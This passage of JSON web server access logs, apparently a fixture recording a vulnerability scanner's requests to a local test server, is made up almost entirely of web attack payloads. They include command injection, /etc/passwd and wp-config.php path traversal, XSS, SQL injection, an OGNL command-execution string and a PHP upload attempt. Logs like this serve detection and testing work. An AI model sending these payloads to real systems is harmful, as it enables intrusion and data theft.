HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm_program/system/redirect.php?url=javascript://%250aalert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /menu/stapp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpunit.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:30 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KAXwP6WPv1YPhUU4bOg5qe9DT.php\x22\x0D\x0A\x0D\x0A29KAXy1FmkU1nfBimqwtGxDQgvo\x0D\x0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ\x0D\x0AContent-Disposition: form-data; name=\x22name\x22\x0D\x0A\x0D\x0A29KAXwP6WPv1YPhUU4bOg5qe9DT.php\x5Cx0A\x0D\x0A------WebKitFormBoundaryKc8fBVDo558U4hbJ--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search.php?searchtype=5 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aqsm_remove_file_fd_question\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22file_url\x22\x0D\x0A\x0D\x0A{{fullpath}}wp-content/plugins/quiz-master-next/README.md\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/?uid=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAXwP6WPv1YPhUU4bOg5qe9DT.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aplicacao/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /query-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:31 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) 